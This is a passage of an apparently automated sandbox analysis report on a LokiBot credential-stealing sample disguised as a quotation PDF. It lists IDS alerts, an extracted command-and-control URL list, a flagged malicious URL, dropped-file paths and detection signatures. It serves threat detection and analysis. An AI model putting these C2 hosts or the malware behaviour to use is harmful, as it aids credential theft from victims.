2025-03-04T05:52:51.280717+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49767	104.21.112.1	80	TCP
2025-03-04T05:52:53.242413+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49768	104.21.112.1	80	TCP
2025-03-04T05:52:55.390373+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49769	104.21.112.1	80	TCP
2025-03-04T05:52:57.393552+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49771	104.21.112.1	80	TCP
2025-03-04T05:52:59.297752+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49772	104.21.112.1	80	TCP
2025-03-04T05:53:01.213934+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49773	104.21.112.1	80	TCP
2025-03-04T05:53:03.250460+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49783	104.21.112.1	80	TCP
2025-03-04T05:53:05.163192+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49785	104.21.112.1	80	TCP
2025-03-04T05:53:07.118673+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49806	104.21.112.1	80	TCP
2025-03-04T05:53:09.017703+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49820	104.21.112.1	80	TCP
2025-03-04T05:53:10.938486+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49836	104.21.112.1	80	TCP
2025-03-04T05:53:12.890924+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49847	104.21.112.1	80	TCP
2025-03-04T05:53:14.844487+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49863	104.21.112.1	80	TCP
2025-03-04T05:53:16.746696+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49874	104.21.112.1	80	TCP
2025-03-04T05:53:18.641647+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49890	104.21.112.1	80	TCP
2025-03-04T05:53:20.573082+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49902	104.21.112.1	80	TCP
2025-03-04T05:53:22.494515+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49917	104.21.112.1	80	TCP
2025-03-04T05:53:24.311794+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49928	104.21.112.1	80	TCP
2025-03-04T05:53:26.281475+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49941	104.21.112.1	80	TCP
2025-03-04T05:53:28.223341+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49950	104.21.112.1	80	TCP
2025-03-04T05:53:30.080789+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49961	104.21.112.1	80	TCP
2025-03-04T05:53:31.950332+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49974	104.21.112.1	80	TCP
2025-03-04T05:53:33.715423+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49985	104.21.112.1	80	TCP
2025-03-04T05:53:35.625690+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50001	104.21.112.1	80	TCP
2025-03-04T05:53:37.561185+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50012	104.21.112.1	80	TCP
2025-03-04T05:53:39.458912+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50023	104.21.112.1	80	TCP
2025-03-04T05:53:41.908562+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50039	104.21.112.1	80	TCP
2025-03-04T05:53:43.803522+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50052	104.21.112.1	80	TCP
2025-03-04T05:53:45.699594+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50068	104.21.112.1	80	TCP
2025-03-04T05:53:47.604073+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50079	104.21.112.1	80	TCP
2025-03-04T05:53:49.515496+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50082	104.21.112.1	80	TCP
2025-03-04T05:53:51.452116+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50083	104.21.112.1	80	TCP
2025-03-04T05:53:53.373080+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50084	104.21.112.1	80	TCP
2025-03-04T05:53:55.241423+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50085	104.21.112.1	80	TCP
2025-03-04T05:53:57.158338+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50086	104.21.112.1	80	TCP
2025-03-04T05:53:59.108965+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50087	104.21.112.1	80	TCP
2025-03-04T05:54:01.042324+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50088	104.21.112.1	80	TCP
2025-03-04T05:54:02.986977+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50089	104.21.112.1	80	TCP
2025-03-04T05:54:04.795099+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50090	104.21.112.1	80	TCP
2025-03-04T05:54:06.753481+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50091	104.21.112.1	80	TCP
2025-03-04T05:54:08.705173+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50092	104.21.112.1	80	TCP
2025-03-04T05:54:10.670220+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50093	104.21.112.1	80	TCP
2025-03-04T05:54:12.473876+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50094	104.21.112.1	80	TCP
2025-03-04T05:54:14.523512+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50095	104.21.112.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T05:52:15.867351+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.112.1	80	TCP
2025-03-04T05:52:17.864771+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.112.1	80	TCP
2025-03-04T05:52:18.716899+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.112.1	80	TCP
2025-03-04T05:52:20.596808+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.112.1	80	TCP
2025-03-04T05:52:22.913427+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.112.1	80	TCP
2025-03-04T05:52:24.810788+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.112.1	80	TCP
2025-03-04T05:52:26.701694+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.112.1	80	TCP
2025-03-04T05:52:28.608137+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.112.1	80	TCP
2025-03-04T05:52:30.530000+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.112.1	80	TCP
2025-03-04T05:52:32.479548+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.112.1	80	TCP
2025-03-04T05:52:34.361939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.112.1	80	TCP
2025-03-04T05:52:36.311959+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.112.1	80	TCP
2025-03-04T05:52:38.203627+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.112.1	80	TCP
2025-03-04T05:52:40.160169+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.112.1	80	TCP
2025-03-04T05:52:42.029778+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.112.1	80	TCP
2025-03-04T05:52:43.893264+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.112.1	80	TCP
2025-03-04T05:52:45.672358+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.112.1	80	TCP
2025-03-04T05:52:47.563225+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.112.1	80	TCP
2025-03-04T05:52:49.345420+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.112.1	80	TCP
2025-03-04T05:52:51.280717+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.112.1	80	TCP
2025-03-04T05:52:53.242413+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.112.1	80	TCP
2025-03-04T05:52:55.390373+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.112.1	80	TCP
2025-03-04T05:52:57.393552+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.112.1	80	TCP
2025-03-04T05:52:59.297752+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.112.1	80	TCP
2025-03-04T05:53:01.213934+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.112.1	80	TCP
2025-03-04T05:53:03.250460+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.112.1	80	TCP
2025-03-04T05:53:05.163192+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.112.1	80	TCP
2025-03-04T05:53:07.118673+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49806	104.21.112.1	80	TCP
2025-03-04T05:53:09.017703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49820	104.21.112.1	80	TCP
2025-03-04T05:53:10.938486+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49836	104.21.112.1	80	TCP
2025-03-04T05:53:12.890924+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49847	104.21.112.1	80	TCP
2025-03-04T05:53:14.844487+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49863	104.21.112.1	80	TCP
2025-03-04T05:53:16.746696+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.112.1	80	TCP
2025-03-04T05:53:18.641647+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49890	104.21.112.1	80	TCP
2025-03-04T05:53:20.573082+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49902	104.21.112.1	80	TCP
2025-03-04T05:53:22.494515+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.112.1	80	TCP
2025-03-04T05:53:24.311794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49928	104.21.112.1	80	TCP
2025-03-04T05:53:26.281475+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49941	104.21.112.1	80	TCP
2025-03-04T05:53:28.223341+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49950	104.21.112.1	80	TCP
2025-03-04T05:53:30.080789+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49961	104.21.112.1	80	TCP
2025-03-04T05:53:31.950332+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49974	104.21.112.1	80	TCP
2025-03-04T05:53:33.715423+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49985	104.21.112.1	80	TCP
2025-03-04T05:53:35.625690+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50001	104.21.112.1	80	TCP
2025-03-04T05:53:37.561185+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50012	104.21.112.1	80	TCP
2025-03-04T05:53:39.458912+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50023	104.21.112.1	80	TCP
2025-03-04T05:53:41.908562+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.112.1	80	TCP
2025-03-04T05:53:43.803522+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50052	104.21.112.1	80	TCP
2025-03-04T05:53:45.699594+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50068	104.21.112.1	80	TCP
2025-03-04T05:53:47.604073+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50079	104.21.112.1	80	TCP
2025-03-04T05:53:49.515496+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50082	104.21.112.1	80	TCP
2025-03-04T05:53:51.452116+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.112.1	80	TCP
2025-03-04T05:53:53.373080+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50084	104.21.112.1	80	TCP
2025-03-04T05:53:55.241423+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50085	104.21.112.1	80	TCP
2025-03-04T05:53:57.158338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50086	104.21.112.1	80	TCP
2025-03-04T05:53:59.108965+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50087	104.21.112.1	80	TCP
2025-03-04T05:54:01.042324+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50088	104.21.112.1	80	TCP
2025-03-04T05:54:02.986977+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.112.1	80	TCP
2025-03-04T05:54:04.795099+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50090	104.21.112.1	80	TCP
2025-03-04T05:54:06.753481+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50091	104.21.112.1	80	TCP
2025-03-04T05:54:08.705173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50092	104.21.112.1	80	TCP
2025-03-04T05:54:10.670220+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50093	104.21.112.1	80	TCP
2025-03-04T05:54:12.473876+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50094	104.21.112.1	80	TCP
2025-03-04T05:54:14.523512+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.112.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/sccc/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\bCirqu.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Quotation_Order_Request_pdf.bat.exe	Virustotal: Detection: 30%			Perma Link
Source: Quotation_Order_Request_pdf.bat.exe	ReversingLabs: Detection: 26%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbi source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m(C:\Windows\HrOW.pdbm source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb& source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Roaming\HrOW.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\HrOW.pdb`A source: bCirqu.exe, 00000009.00000002.1994302880.00000000006C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\HrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tc.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: HrOW.pdb source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr, WER9EB9.tmp.dmp.16.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2947233942.0000000000802000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\HrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.000000000680C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: HrOW.pdbSHA256q source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr, WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\bCirqu.PDB=J+T source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\HrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Dynamic.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb= source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\HrOW.pdbpdbrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HrOW.pdb21-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32d source: bCirqu.exe, 00000009.00000002.2002963131.000000000680C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb< source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: HrOW.pdbs\HrOW.pdbpdbrOW.pdbrOW.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: bCirqu.exe, 00000009.00000002.2002963131.000000000680C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdbp$ source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbntfk source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.CSharp.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb0 source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: Osymbols\exe\HrOW.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2947233942.0000000000802000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: mscorlib.pdbup source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\HrOW.pdb1v source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: bCirqu.exe, 00000009.00000002.1994302880.0000000000702000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdbh source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: bCirqu.exe, 00000009.00000002.1994302880.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: bCirqu.exe, 00000009.00000002.2002963131.000000000682A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbH)T source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: m.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb$ source: bCirqu.exe, 00000009.00000002.2002963131.000000000682A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9EB9.tmp.dmp.16.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

8_2_00403D74

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Code function: 4x nop then jmp 0B6A248Ch

0_2_0B6A1A56

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49741 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 104.21.112.1:80
